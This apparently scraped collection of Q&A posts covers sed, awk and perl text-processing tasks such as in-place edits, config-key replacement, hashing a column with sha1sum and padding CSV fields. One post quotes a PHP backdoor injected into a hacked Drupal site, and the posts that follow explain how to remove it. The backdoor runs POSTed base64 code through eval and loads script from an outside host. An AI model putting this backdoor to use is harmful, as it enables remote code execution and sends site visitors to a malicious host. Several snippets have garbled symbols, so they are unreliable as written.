I have a sed file that replaces all occurrences of a string in a file with other string.
I want to do it inline but without using -i from terminal
What changes are to be made to the .sed file
#!/bin/sed
s/include/\#include/
Just use awk:
{ sub(/include/,"#include"); rec = rec $0 RS }
END{ printf "%s", rec > FILENAME }
or if you want to operate strictly on strings:
BEGIN{ old="include"; new="#include" }
s = index($0,old) {$0 = substr($0,1,s-1) new substr($0,s+length(old))
{ rec = rec $0 RS }
END{ printf "%s", rec > FILENAME }
which can be simplified to:
s = index($0,"include") {$0 = substr($0,1,s-1) "#" substr($0,s)
{ rec = rec $0 RS }
END{ printf "%s", rec > FILENAME }
in this particular case of just prepending # to a string.
I don't think it will work, because the -i and -f options can usually both have arguments, but you could be lucky.
The shebang line can contain one option group (aka cluster). You would need for it to contain -f (this is missing from your example) so the cluster could look like
#!/bin/sed -if
provided that your dialect doesn't require an argument to the -i option, and permits clustering like this in the first place (-if pro -i -f).
The obvious workaround is to change the script to a shell script; the -f option is no longer required because the script is not in a file.
#!/bin/sh
exec sed -i 's/include/\#include/' "$#"
Related
I would like to replace or append in a configuration file like sshd_config:
Key1 value
#Key2 value
The idea of the command is:
$ cmd Key1 home file
$ cmd Key2 house file
$ cmd Key3 flat file
So the resulting file is:
Key1 home
Key2 house
Key3 flat
Any help is more than welcome.
I have taken this as an example but the one that comments and uncomments is not properly working.
Besides I have managed with other options but only for comments or uncommented lines and I want everything in one command if possible.
sed '/^Key\s/{h;s/\(\s\).*/\1newvalue/};${x;/^$/{s//Key newvalue/;H};x}' file
This one gets if the Key exists but, how do I append if it doesn't=
sed -i 's/^#\(Key\s\).*/\1newvalue/g' file
Thanks a lot. I have tried to understand sed but it is quite complex the different spaces and I don't know how to get with # or without.
Edit: Stdout output with -i inplace
$ sudo tee -a /usr/local/bin/conf-space-replace-or-append > /dev/null << 'EOL'
#!/bin/bash
awk -i inplace -v key="$1" -v val="$2" '
($1 == key) || ($1 == "#"key) { $0 = key OFS val; done=1 }
{ print }
END { if (!done) print key, val }
' "$3" > /dev/null
EOL
$ sudo chmod +x /usr/local/bin/conf-space-replace-or-append
$ sudo conf-space-replace-or-append Port 22 /etc/ssh/sshd_config
sed is for doing s/old/new on an individual line, that is all. For anything else you should be using awk for clarity, simplicity, portability, efficiency, etc., etc.
Just put the following in a file named cmd and execute it as you show in your question.
awk -v key="$1" -v val="$2" '
($1 == key) || ($1 == "#"key) { next }
{ print }
END { print key, val }
' "$3"
The above will delete the existing key+val if present and always appends the new pair to the end of the file. If you'd rather keep an existing key in it's original position in the file and only add new key+val pairs to the end then that's just a tweak:
awk -v key="$1" -v val="$2" '
($1 == key) || ($1 == "#"key) { $0 = key OFS val; done=1 }
{ print }
END { if (!done) print key, val }
' "$3"
I have a "pipe-separated" file that has about 20 columns. I want to just hash the first column which is a number like account number using sha1sum and return the rest of the columns as is.
Whats the best way I can do this using awk or sed?
Accountid|Time|Category|.....
8238438|20140101021301|sub1|...
3432323|20140101041903|sub2|...
9342342|20140101050303|sub1|...
Above is an example of the text file showing just 3 columns. Only the first column has the hashfunction implemented on it. Result should like:
Accountid|Time|Category|.....
104a1f34b26ae47a67273fe06456be1fe97f75ba|20140101021301|sub1|...
c84270c403adcd8aba9484807a9f1c2164d7f57b|20140101041903|sub2|...
4fa518d8b005e4f9a085d48a4b5f2c558c8402eb|20140101050303|sub1|...
What the Best Way™ is is up for debate. One way to do it with awk is
awk -F'|' 'BEGIN { OFS=FS } NR == 1 { print } NR != 1 { gsub(/'\''/, "'\'\\\\\'\''", $1); command = ("echo '\''" $1 "'\'' | sha1sum -b | cut -d\\ -f 1"); command | getline hash; close(command); $1 = hash; print }' filename
That is
BEGIN {
OFS = FS # set output field separator to field separator; we will use
# it because we meddle with the fields.
}
NR == 1 { # first line: just print headers.
print
}
NR != 1 { # from there on do the hash/replace
# this constructs a shell command (and runs it) that echoes the field
# (singly-quoted to prevent surprises) through sha1sum -b, cuts out the hash
# and gets it back into awk with getline (into the variable hash)
# the gsub bit is to prevent the shell from barfing if there's an apostrophe
# in one of the fields.
gsub(/'/, "'\\''", $1);
command = ("echo '" $1 "' | sha1sum -b | cut -d\\ -f 1")
command | getline hash
close(command)
# then replace the field and print the result.
$1 = hash
print
}
You will notice the differences between the shell command at the top and the awk code at the bottom; that is all due to shell expansion. Because I put the awk code in single quotes in the shell commands (double quotes are not up for debate in that context, what with $1 and all), and because the code contains single quotes, making it work inline leads to a nightmare of backslashes. Because of this, my advice is to put the awk code into a file, say foo.awk, and run
awk -F'|' -f foo.awk filename
instead.
Here's an awk executable script that does what you want:
#!/usr/bin/awk -f
BEGIN { FS=OFS="|" }
FNR != 1 { $1 = encodeData( $1 ) }
47
function encodeData( fld ) {
cmd = sprintf( "echo %s | sha1sum", fld )
cmd | getline output
close( cmd )
split( output, arr, " " )
return arr[1]
}
Here's the flow break down:
Set the input and output field separators to |
When the row isn't the first (header) row, re-assign $1 to an encoded value
Print the entire row when 47 is true (always)
Here's the encodeData function break down:
Create a cmd to feed data to sha1sum
Feed it to getline
Close the cmd
On my system, there's extra info after sha1sum, so I discard it by spliting the output
Return the first field of the sha1sum output.
With your data, I get the following:
Accountid|Time|Category|.....
104a1f34b26ae47a67273fe06456be1fe97f75ba|20140101021301|sub1|...
c84270c403adcd8aba9484807a9f1c2164d7f57b|20140101041903|sub2|...
4fa518d8b005e4f9a085d48a4b5f2c558c8402eb|20140101050303|sub1|...
running by calling awk.script data (or ./awk.script data if you bash)
EDIT by EdMorton:
sorry for the edit, but your script above is the right approach but needs some tweaks to make it more robust and this is much easier than trying to describe them in a comment:
$ cat tst.awk
BEGIN { FS=OFS="|" }
NR==1 { for (i=1; i<=NF; i++) f[$i] = i; next }
{ $(f["Accountid"]) = encodeData($(f["Accountid"])); print }
function encodeData( fld, cmd, output ) {
cmd = "echo \047" fld "\047 | sha1sum"
if ( (cmd | getline output) > 0 ) {
sub(/ .*/,"",output)
}
else {
print "failed to hash " fld | "cat>&2"
output = fld
}
close( cmd )
return output
}
$ awk -f tst.awk file
104a1f34b26ae47a67273fe06456be1fe97f75ba|20140101021301|sub1|...
c84270c403adcd8aba9484807a9f1c2164d7f57b|20140101041903|sub2|...
4fa518d8b005e4f9a085d48a4b5f2c558c8402eb|20140101050303|sub1|...
The f[] array decouples your script from hard-coding the number of the field that needs to be hashed, the additional args for your function make them local and so always null/zero on each invocation, the if on getline means you won't return the previous success value if it fails (see http://awk.info/?tip/getline) and the rest is maybe more style/preference with a bit of a performance improvement.
I'm having a problem dealing with some files. I need to perform a column count for every line in a file and depending the number of columns i need to add severals ',' in in the end of each line. All lines should have 36 columns separated by ','
This line solves my problem, but how do I run it in a folder with several files in a automated way?
awk ' BEGIN { FS = "," } ;
{if (NF == 32) { print $0",,,," } else if (NF==31) { print $0",,,,," }
}' <SOURCE_FILE> > <DESTINATION_FILE>
Thank you for all your support
R&P
The answer depends on your OS, which you haven't told us. On UNIX and assuming you want to modify each original file, it'd be:
for file in *
do
awk '...' "$file" > tmp$$ && mv tmp$$ "$file"
done
Also, in general to get all records in a file to have the same number of fields you can do this without needing to specify what that number of fields is (though you can if appropriate):
$ cat tst.awk
BEGIN { FS=OFS=","; ARGV[ARGC++] = ARGV[ARGC-1] }
NR==FNR { nf = (NF > nf ? NF : nf); next }
{
tail = sprintf("%*s",nf-NF,"")
gsub(/ /,OFS,tail)
print $0 tail
}
$
$ cat file
a,b,c
a,b
a,b,c,d,e
$
$ awk -f tst.awk file
a,b,c,,
a,b,,,
a,b,c,d,e
$
$ awk -v nf=10 -f tst.awk file
a,b,c,,,,,,,
a,b,,,,,,,,
a,b,c,d,e,,,,,
It's a short one-liner with Perl:
perl -i.bak -F, -alpe '$_ .= "," x (36-#F)' *
if this is only a single folder without subfolders, use:
for oldfile in /path/to/files/*
do
newfile="${oldfile}.new"
awk '...' "${oldfile}" > "${newfile}"
done
if you also want to include subdirectories recursively, it's probably easiest to put the awk+redirection into a small shell-script, like this:
#!/bin/bash
oldfile=$1
newfile="${oldfile}.new"
awk '...' "${oldfile}" > "${newfile}"
and then run this script (let's calls it runawk.sh) via find:
find /path/to/files/ -type f -not -name "*.new" -exec runawk.sh \{\} \;
I have a problem that I need to call a Perl script with parameters passing in and get the return value of the Perl script in an AWK BEGIN block. Just like below.
I have a Perl script util.pl
#!/usr/bin/perl -w
$res=`$exe_cmd`;
print $res;
Now in the AWK BEGIN block (ksh) I need to call the script and get the return value.
BEGIN { print "in awk, application type is " type;
} \
{call per script here;}
How do I call the Perl script with parameter and get the return value of $res?
res = util.pl a b c;
Pipe the script into getline:
awk 'BEGIN {
cmd = "util.pl a b c";
cmd | getline res;
close(cmd);
print "in awk, application type is " res
}'
Part of an AWK-script I use for extracting data from a ldap query. Perhaps you can find some inspiration from how I do the base64 decoding below...
/^dn:/{
if($0 ~ /^dn: /){
split($0, a, "[:=,]")
name=a[3]
}
else if($0 ~ /^dn::/){
# Special handling needed since ldap apparently
# uses base64 encoded strings for *some* users
cmd = "/usr/bin/base64 -i -d <<< " $2 " 2>/dev/null"
while ( ( cmd | getline result ) > 0 ) { }
close(cmd)
split(result, a, "[:=,]")
name=a[2]
}
}
I got hacked by running a really outdated Drupal installation (shame on me)
It seems they injected the following in every .php file;
<?php global $sessdt_o; if(!$sessdt_o) {
$sessdt_o = 1; $sessdt_k = "lb11";
if(!#$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
}
else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
sessdt_j = #$_SERVER["HTTP_HOST"].#$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
Can I remove and replace this with sed? e.g.:
find . -name *.php | xargs ...
I hope to have the site working just for the time being to use wget and made a static copy.
You can use sed with something like
sed '1 s/^.*$/<?php/'
The 1 part only replaces the first line. Then, thanks to the s command, it replaces the whole line by <?php.
To modify your files in-place, use the -i option of GNU sed.
To replace the first line of a file, you can use the c (for "change") command of sed:
sed '1c<?php'
which translates to: "on line 1, replace the pattern space with <?php".
For this particular problem, however, something like this would probably work:
sed '1,/^$/c<?php'
which reads: change the range "line 1 to the first empty line" to <?php, thus replacing all injected code.
(The second part of the address (the regular expression /^$/) should be replaced with an expression that would actually delimit the injected code, if it is not an empty line.)
# replace only first line
printf 'a\na\na\n' | sed '1 s/a/b/'
printf 'a\na\na\n' | perl -pe '$. <= 1 && s/a/b/'
result:
b
a
a
perl is needed for more complex regex,
for example regex lookaround (lookahead, lookbehind)
sample use:
patch shebang lines in script files to use /usr/bin/env
shebang line is the first line: #!/bin/bash etc
find . -type f -exec perl -p -i -e \
'$. <= 1 && s,^#!\s*(/usr)?/bin/(?!env)(.+)$,#!/usr/bin/env \2,' '{}' \;
this will replace #! /usr/bin/python3 with #!/usr/bin/env python3
to make the script more portable (nixos linux, ...)
the (?!env) (negative lookahead) prevents double-replacing
its not perfect, since #!/bin/env foo is not replaced with #!/usr/bin/env foo ...